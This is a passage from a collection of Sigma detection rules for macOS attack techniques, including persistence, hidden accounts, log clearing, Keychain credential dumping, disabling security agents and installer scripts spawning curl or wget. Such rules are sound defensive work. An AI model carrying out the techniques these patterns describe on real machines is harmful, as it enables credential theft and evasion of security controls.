    "content": "title: MacOS Emond Launch Daemon\nid: 23c43900-e732-45a4-8354-63e4a6c187ce\nstatus: test\ndescription: Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md\n    - https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124\nauthor: Alejandro Ortuno, oscd.community\ndate: 2020-10-23\nmodified: 2021-11-27\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.014\nlogsource:\n    category: file_event\n    product: macos\ndetection:\n    selection_1:\n        TargetFilename|contains: '/etc/emond.d/rules/'\n        TargetFilename|endswith: '.plist'\n    selection_2:\n        TargetFilename|contains: '/private/var/db/emondClients/'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/file_event/file_event_macos_susp_startup_item_created.yml",
    "content": "title: Startup Item File Created - MacOS\nid: dfe8b941-4e54-4242-b674-6b613d521962\nstatus: test\ndescription: |\n    Detects the creation of a startup item plist file, that automatically get executed at boot initialization to establish persistence.\n    Adversaries may use startup items automatically executed at boot initialization to establish persistence.\n    Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.005/T1037.005.md\n    - https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html\nauthor: Alejandro Ortuno, oscd.community\ndate: 2020-10-14\nmodified: 2024-08-11\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1037.005\nlogsource:\n    category: file_event\n    product: macos\ndetection:\n    selection:\n        TargetFilename|startswith:\n            - '/Library/StartupItems/'\n            - '/System/Library/StartupItems'\n        TargetFilename|endswith: '.plist'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_applescript.yml",
    "content": "title: MacOS Scripting Interpreter AppleScript\nid: 1bc2e6c5-0885-472b-bed6-be5ea8eace55\nstatus: test\ndescription: Detects execution of osascript, the interpreter for the macOS scripting language AppleScript.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.002/T1059.002.md\n    - https://redcanary.com/blog/applescript/\nauthor: Alejandro Ortuno, oscd.community\ndate: 2020-10-21\nmodified: 2023-02-01\ntags:\n    - attack.execution\n    - attack.t1059.002\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith: '/osascript'\n        CommandLine|contains:\n            - ' -e '\n            - '.scpt'\n            - '.js'\n    condition: selection\nfalsepositives:\n    - Application installers might contain scripts as part of the installation process.\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_base64_decode.yml",
    "content": "title: Decode Base64 Encoded Text - MacOS\nid: 719c22d7-c11a-4f2c-93a6-2cfdd5412f68\nstatus: test\ndescription: Detects usage of the base64 utility to decode arbitrary base64-encoded text\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2020-10-19\nmodified: 2022-11-26\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image: '/usr/bin/base64'\n        CommandLine|contains: '-d'\n    condition: selection\nfalsepositives:\n    - Legitimate activities\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_binary_padding.yml",
    "content": "title: Binary Padding - MacOS\nid: 95361ce5-c891-4b0a-87ca-e24607884a96\nstatus: test\ndescription: Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detects the use of dd and truncate to append junk data to a file.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md\n    - https://linux.die.net/man/1/truncate\n    - https://linux.die.net/man/1/dd\nauthor: 'Igor Fits, Mikhail Larin, oscd.community'\ndate: 2020-10-19\nmodified: 2023-02-17\ntags:\n    - attack.defense-evasion\n    - attack.t1027.001\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection_truncate:\n        Image|endswith: '/truncate'\n        CommandLine|contains: '-s +'\n    selection_dd:\n        Image|endswith: '/dd'\n        CommandLine|contains:\n            - 'if=/dev/zero' # null-byte padding\n            - 'if=/dev/random' # random-byte padding\n            - 'if=/dev/urandom' # random-byte padding; on macOS /dev/urandom is identical to /dev/random\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate script work\nlevel: high\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_change_file_time_attr.yml",
    "content": "title: File Time Attribute Change\nid: 88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0\nstatus: test\ndescription: Detects changes to file time attributes via touch, used to hide new files or changes to existing files\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md\nauthor: Igor Fits, Mikhail Larin, oscd.community\ndate: 2020-10-19\nmodified: 2022-01-12\ntags:\n    - attack.defense-evasion\n    - attack.t1070.006\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/touch'\n        CommandLine|contains:\n            - '-t'\n            - '-acmr'\n            - '-d'\n            - '-r'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_chflags_hidden_flag.yml",
    "content": "title: Hidden Flag Set On File/Directory Via Chflags - MacOS\nid: 3b2c1059-ae5f-40b6-b5d4-6106d3ac20fe\nstatus: test\ndescription: |\n    Detects the execution of the \"chflags\" utility with the \"hidden\" flag, in order to hide files on MacOS.\n    When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.\nreferences:\n    - https://www.sentinelone.com/labs/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/\n    - https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/\n    - https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf\n    - https://ss64.com/mac/chflags.html\nauthor: Omar Khaled (@beacon_exe)\ndate: 2024-08-21\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.command-and-control\n    - attack.t1218\n    - attack.t1564.004\n    - attack.t1552.001\n    - attack.t1105\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/chflags'\n        CommandLine|contains: 'hidden '\n    condition: selection\nfalsepositives:\n    - Legitimate usage of chflags by administrators and users.\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml",
    "content": "title: Indicator Removal on Host - Clear Mac System Logs\nid: acf61bd8-d814-4272-81f0-a7a269aa69aa\nstatus: test\ndescription: Detects deletion of local audit logs\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md\nauthor: remotephone, oscd.community\ndate: 2020-10-11\nmodified: 2022-09-16\ntags:\n    - attack.defense-evasion\n    - attack.t1070.002\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection1:\n        Image|endswith:\n            - '/rm'\n            - '/unlink'\n            - '/shred'\n    selection_cli_1:\n        CommandLine|contains: '/var/log'\n    selection_cli_2:\n        CommandLine|contains|all:\n            - '/Users/'\n            - '/Library/Logs/'\n    condition: selection1 and 1 of selection_cli*\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_clipboard_data_via_osascript.yml",
    "content": "title: Clipboard Data Collection Via OSAScript\nid: 7794fa3c-edea-4cff-bec7-267dd4770fd7\nrelated:\n    - id: 1bc2e6c5-0885-472b-bed6-be5ea8eace55\n      type: derived\nstatus: test\ndescription: Detects possible collection of data from the clipboard via execution of the osascript binary\nreferences:\n    - https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023-01-31\ntags:\n    - attack.collection\n    - attack.execution\n    - attack.t1115\n    - attack.t1059.002\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'osascript'\n            - ' -e '\n            - 'clipboard'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_create_account.yml",
    "content": "title: Creation Of A Local User Account\nid: 51719bf5-e4fd-4e44-8ba8-b830e7ac0731\nstatus: test\ndescription: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md\n    - https://ss64.com/osx/sysadminctl.html\nauthor: Alejandro Ortuno, oscd.community\ndate: 2020-10-06\nmodified: 2023-02-18\ntags:\n    - attack.t1136.001\n    - attack.persistence\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_dscl:\n        Image|endswith: '/dscl'\n        CommandLine|contains: 'create'\n    selection_sysadminctl:\n        Image|endswith: '/sysadminctl'\n        CommandLine|contains: 'addUser'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_create_hidden_account.yml",
    "content": "title: Hidden User Creation\nid: b22a5b36-2431-493a-8be1-0bae56c28ef3\nstatus: test\ndescription: Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.002/T1564.002.md\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2020-10-10\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1564.002\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    dscl_create:\n        Image|endswith: '/dscl'\n        CommandLine|contains: 'create'\n    id_below_500:\n        CommandLine|contains: UniqueID\n        CommandLine|re: '([0-9]|[1-9][0-9]|[1-4][0-9]{2})'\n    ishidden_option_declaration:\n        CommandLine|contains: 'IsHidden'\n    ishidden_option_confirmation:\n        CommandLine|contains:\n            - 'true'\n            - 'yes'\n            - '1'\n    condition: dscl_create and id_below_500 or dscl_create and (ishidden_option_declaration and ishidden_option_confirmation)\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml",
    "content": "title: Credentials from Password Stores - Keychain\nid: b120b587-a4c2-4b94-875d-99c9807d6955\nstatus: test\ndescription: Detects password dumps from the Keychain\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md\n    - https://gist.github.com/Capybara/6228955\nauthor: Tim Ismilyaev, oscd.community, Florian Roth (Nextron Systems)\ndate: 2020-10-19\nmodified: 2021-11-27\ntags:\n    - attack.credential-access\n    - attack.t1555.001\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection1:\n        Image: '/usr/bin/security'\n        CommandLine|contains:\n            - 'find-certificate'\n            - ' export '\n    selection2:\n        CommandLine|contains:\n            - ' dump-keychain '\n            - ' login-keychain '\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml",
    "content": "title: System Integrity Protection (SIP) Disabled\nid: 3603f18a-ec15-43a1-9af2-d196c8a7fec6\nstatus: test\ndescription: |\n    Detects the use of csrutil to disable System Integrity Protection (SIP). This technique is used in post-exploitation scenarios.\nreferences:\n    - https://ss64.com/osx/csrutil.html\n    - https://objective-see.org/blog/blog_0x6D.html\n    - https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/\n    - https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2024-01-02\ntags:\n    - attack.discovery\n    - attack.t1518.001\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    # VT Query: behavior_processes:\"csrutil status\" p:5+ type:mac\n    selection:\n        Image|endswith: '/csrutil'\n        CommandLine|contains: 'disable'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_csrutil_status.yml",
    "content": "title: System Integrity Protection (SIP) Enumeration\nid: 53821412-17b0-4147-ade0-14faae67d54b\nstatus: test\ndescription: |\n    Detects the use of csrutil to view the System Integrity Protection (SIP) status. This technique is used in post-exploitation scenarios.\nreferences:\n    - https://ss64.com/osx/csrutil.html\n    - https://objective-see.org/blog/blog_0x6D.html\n    - https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/\n    - https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2024-01-02\ntags:\n    - attack.discovery\n    - attack.t1518.001\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    # VT Query: behavior_processes:\"csrutil status\" p:5+ type:mac\n    selection:\n        Image|endswith: '/csrutil'\n        CommandLine|contains: 'status'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml",
    "content": "title: Disable Security Tools\nid: ff39f1a6-84ac-476f-a1af-37fcdf53d7c0\nstatus: test\ndescription: Detects attempts to disable security tools by unloading their launchd plists via launchctl, or by disabling Gatekeeper via spctl\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2020-10-19\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    launchctl_unload:\n        Image: '/bin/launchctl'\n        CommandLine|contains: 'unload'\n    security_plists:\n        CommandLine|contains:\n            - 'com.objective-see.lulu.plist'                     # Objective-See firewall management utility\n            - 'com.objective-see.blockblock.plist'               # Objective-See persistence locations watcher/blocker\n            - 'com.google.santad.plist'                          # google santa\n            - 'com.carbonblack.defense.daemon.plist'             # carbon black\n            - 'com.carbonblack.daemon.plist'                     # carbon black\n            - 'at.obdev.littlesnitchd.plist'                     # Objective Development Software firewall management utility\n            - 'com.tenablesecurity.nessusagent.plist'            # Tenable Nessus\n            - 'com.opendns.osx.RoamingClientConfigUpdater.plist' # OpenDNS Umbrella\n            - 'com.crowdstrike.falcond.plist'                    # Crowdstrike Falcon\n            - 'com.crowdstrike.userdaemon.plist'                 # Crowdstrike Falcon\n            - 'osquery'                                          # facebook osquery\n            - 'filebeat'                                         # elastic log file shipper\n            - 'auditbeat'                                        # elastic auditing agent/log shipper\n            - 'packetbeat'                                       # elastic network logger/shipper\n            - 'td-agent'                                         # fluentd log shipper\n    disable_gatekeeper:\n        Image: '/usr/sbin/spctl'\n        CommandLine|contains: 'disable'\n    condition: (launchctl_unload and security_plists) or disable_gatekeeper\nfalsepositives:\n    - Legitimate activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_dscl_add_user_to_admin_group.yml",
    "content": "title: User Added To Admin Group Via Dscl\nid: b743623c-2776-40e0-87b1-682b975d0ca5\nrelated:\n    - id: 0c1ffcf9-efa9-436e-ab68-23a9496ebf5b\n      type: obsolete\nstatus: test\ndescription: Detects attempts to create and add an account to the admin group via \"dscl\"\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-2---create-local-account-with-admin-privileges---macos\n    - https://ss64.com/osx/dscl.html\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023-03-19\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.privilege-escalation\n    - attack.t1078.003\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection: # adds to admin group\n        Image|endswith: '/dscl'\n        CommandLine|contains|all:\n            - ' -append '\n            - ' /Groups/admin '\n            - ' GroupMembership '\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_dseditgroup_add_to_admin_group.yml",
    "content": "title: User Added To Admin Group Via DseditGroup\nid: 5d0fdb62-f225-42fb-8402-3dfe64da468a\nstatus: test\ndescription: Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos\n    - https://ss64.com/osx/dseditgroup.html\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023-08-22\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.privilege-escalation\n    - attack.t1078.003\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith: '/dseditgroup'\n        CommandLine|contains|all:\n            - ' -o edit ' # edit operation\n            - ' -a ' # username\n            - ' -t user'\n            - 'admin' # Group name\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_dsenableroot_enable_root_account.yml",
    "content": "title: Root Account Enable Via Dsenableroot\nid: 821bcf4d-46c7-4b87-bc57-9509d3ba7c11\nstatus: test\ndescription: Detects attempts to enable the root account via \"dsenableroot\"\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1078.003/T1078.003.md\n    - https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/persistence_enable_root_account.toml\n    - https://ss64.com/osx/dsenableroot.html\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023-08-22\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1078\n    - attack.t1078.001\n    - attack.t1078.003\n    - attack.initial-access\n    - attack.persistence\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith: '/dsenableroot'\n    filter_main_disable:\n        CommandLine|contains: ' -d '\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml",
    "content": "title: File and Directory Discovery - MacOS\nid: 089dbdf6-b960-4bcc-90e3-ffc3480c20f6\nstatus: test\ndescription: Detects usage of system utilities to discover files and directories\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2020-10-19\nmodified: 2022-11-25\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    select_file_with_asterisk:\n        Image: '/usr/bin/file'\n        CommandLine|re: '(.){200,}' # execution of 'file */* *>> /tmp/output.txt' produces a very long command line\n    select_recursive_ls:\n        Image: '/bin/ls'\n        CommandLine|contains: '-R'\n    select_find_execution:\n        Image: '/usr/bin/find'\n    select_mdfind_execution:\n        Image: '/usr/bin/mdfind'\n    select_tree_execution:\n        Image|endswith: '/tree'\n    condition: 1 of select*\nfalsepositives:\n    - Legitimate activities\nlevel: informational\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_find_cred_in_files.yml",
    "content": "title: Credentials In Files\nid: 53b1b378-9b06-4992-b972-dde6e423d2b4\nstatus: test\ndescription: Detects attempts to extract passwords from files with grep or LaZagne\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md\nauthor: 'Igor Fits, Mikhail Larin, oscd.community'\ndate: 2020-10-19\nmodified: 2021-11-27\ntags:\n    - attack.credential-access\n    - attack.t1552.001\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection1:\n        Image|endswith: '/grep'\n        CommandLine|contains: 'password'\n    selection2:\n        CommandLine|contains: 'laZagne'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_gui_input_capture.yml",
    "content": "title: GUI Input Capture - macOS\nid: 60f1ce20-484e-41bd-85f4-ac4afec2c541\nstatus: test\ndescription: Detects attempts to use system dialog prompts to capture user credentials\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md\n    - https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/\nauthor: remotephone, oscd.community\ndate: 2020-10-13\nmodified: 2025-12-05\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.t1056.002\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection_img:\n        Image|endswith: '/osascript'\n    selection_cli_1:\n        CommandLine|contains|all:\n            - '-e'\n            - 'display'\n            - 'dialog'\n            - 'answer'\n    selection_cli_2:\n        CommandLine|contains:\n            - 'admin'\n            - 'administrator'\n            - 'authenticate'\n            - 'authentication'\n            - 'credentials'\n            - 'pass'\n            - 'password'\n            - 'unlock'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration tools and activities\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml",
    "content": "title: Disk Image Creation Via Hdiutil - MacOS\nid: 1cf98dc2-fcb0-47c9-8aea-654c9284d1ae\nstatus: test\ndescription: Detects the execution of the hdiutil utility in order to create a disk image.\nreferences:\n    - https://www.loobins.io/binaries/hdiutil/\n    - https://www.sentinelone.com/blog/from-the-front-linesunsigned-macos-orat-malware-gambles-for-the-win/\n    - https://ss64.com/mac/hdiutil.html\nauthor: Omar Khaled (@beacon_exe)\ndate: 2024-08-10\ntags:\n    - attack.exfiltration\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: /hdiutil\n        CommandLine|contains: 'create'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of hdiutil by administrators and users.\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml",
    "content": "title: Disk Image Mounting Via Hdiutil - MacOS\nid: bf241472-f014-4f01-a869-96f99330ca8c\nstatus: test\ndescription: Detects the execution of the hdiutil utility in order to mount disk images.\nreferences:\n    - https://www.loobins.io/binaries/hdiutil/\n    - https://www.sentinelone.com/blog/from-the-front-linesunsigned-macos-orat-malware-gambles-for-the-win/\n    - https://ss64.com/mac/hdiutil.html\nauthor: Omar Khaled (@beacon_exe)\ndate: 2024-08-10\ntags:\n    - attack.initial-access\n    - attack.collection\n    - attack.t1566.001\n    - attack.t1560.001\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: /hdiutil\n        CommandLine|contains:\n            - 'attach '\n            - 'mount '\n    condition: selection\nfalsepositives:\n    - Legitimate usage of hdiutil by administrators and users.\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_installer_susp_child_process.yml",
    "content": "title: Suspicious Installer Package Child Process\nid: e0cfaecd-602d-41af-988d-f6ccebb2af26\nstatus: test\ndescription: Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters\nreferences:\n    - https://redcanary.com/blog/clipping-silver-sparrows-wings/\n    - https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_installer_package_spawned_network_event.toml\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023-02-18\ntags:\n    - attack.t1059\n    - attack.t1059.007\n    - attack.t1071\n    - attack.t1071.001\n    - attack.execution\n    - attack.command-and-control\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_installer:\n        ParentImage|endswith:\n            - '/package_script_service'\n            - '/installer'\n        Image|endswith:\n            - '/sh'\n            - '/bash'\n            - '/dash'\n            - '/python'\n            - '/ruby'\n            - '/perl'\n            - '/php'\n            - '/javascript'\n            - '/osascript'\n            - '/tclsh'\n            - '/curl'\n            - '/wget'\n        CommandLine|contains:\n            - 'preinstall'\n            - 'postinstall'\n    condition: selection_installer\nfalsepositives:\n    - Legitimate software uses the scripts (preinstall, postinstall)\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_ioreg_discovery.yml",
    "content": "title: System Information Discovery Using Ioreg\nid: 2d5e7a8b-f484-4a24-945d-7f0efd52eab0\nstatus: test\ndescription: |\n    Detects the use of \"ioreg\", which shows I/O Kit registry information.\n    This process is used for system information discovery.\n    It has been observed in the wild, either by calling this process directly or by using bash and grep to look for specific strings.\nreferences:\n    - https://www.virustotal.com/gui/file/0373d78db6c3c0f6f6dcc409821bf89e1ad8c165d6f95c5c80ecdce2219627d7/behavior\n    - https://www.virustotal.com/gui/file/4ffdc72d1ff1ee8228e31691020fc275afd1baee5a985403a71ca8c7bd36e2e4/behavior\n    - https://www.virustotal.com/gui/file/5907d59ec1303cfb5c0a0f4aaca3efc0830707d86c732ba6b9e842b5730b95dc/behavior\n    - https://www.trendmicro.com/en_ph/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-12-20\nmodified: 2024-01-02\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    # Examples:\n    #   /bin/bash /bin/sh -c ioreg -l | grep -e 'VirtualBox' -e 'Oracle' -e 'VMware' -e 'Parallels' | wc -l\n    #   /usr/sbin/ioreg ioreg -rd1 -w0 -c AppleAHCIDiskDriver\n    #   /bin/bash /bin/sh -c ioreg -l | grep -e 'USB Vendor Name'\n    #   ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformSerialNumber/ { split($0, line, \\\"\\\\\\\"\\\"); printf(\\\"%s\\\", line[4]); }\n    selection_img:\n        - Image|endswith: '/ioreg'\n        - CommandLine|contains: 'ioreg'\n    selection_cmd1:\n        CommandLine|contains:\n            - '-l'\n            - '-c'\n    selection_cmd2:\n        CommandLine|contains:\n            - 'AppleAHCIDiskDriver'\n            - 'IOPlatformExpertDevice'\n            - 'Oracle'\n            - 'Parallels'\n            - 'USB Vendor Name'\n            - 'VirtualBox'\n            - 'VMware'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrative activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_jamf_susp_child.yml",
    "content": "title: JAMF MDM Potential Suspicious Child Process\nid: 2316929c-01aa-438c-970f-099145ab1ee6\nstatus: test\ndescription: Detects potential suspicious child processes of \"jamf\". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent.\nreferences:\n    - https://github.com/MythicAgents/typhon/\n    - https://www.zoocoup.org/casper/jamf_cheatsheet.pdf\n    - https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-22\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        ParentImage|endswith: '/jamf'\n        Image|endswith:\n            # Note: Add additional binaries/commands that are uncommon during your typical admin usage of Jamf\n            - '/bash'\n            - '/sh'\n    condition: selection\nfalsepositives:\n    - Legitimate execution of custom scripts or commands by Jamf administrators. Apply additional filters accordingly\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_jamf_usage.yml",
    "content": "title: JAMF MDM Execution\nid: be2e3a5c-9cc7-4d02-842a-68e9cb26ec49\nstatus: test\ndescription: |\n    Detects execution of the \"jamf\" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control policies.\nreferences:\n    - https://github.com/MythicAgents/typhon/\n    - https://www.zoocoup.org/casper/jamf_cheatsheet.pdf\n    - https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html\nauthor: Jay Pandit\ndate: 2023-08-22\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith: '/jamf'\n        CommandLine|contains:\n            # Note: add or remove commands according to your policy\n            - 'createAccount'\n            - 'manage'\n            - 'removeFramework'\n            - 'removeMdmProfile'\n            - 'resetPassword'\n            - 'setComputerName'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the JAMF CLI tool by IT support and administrators\nlevel: low\n"
  },
  {
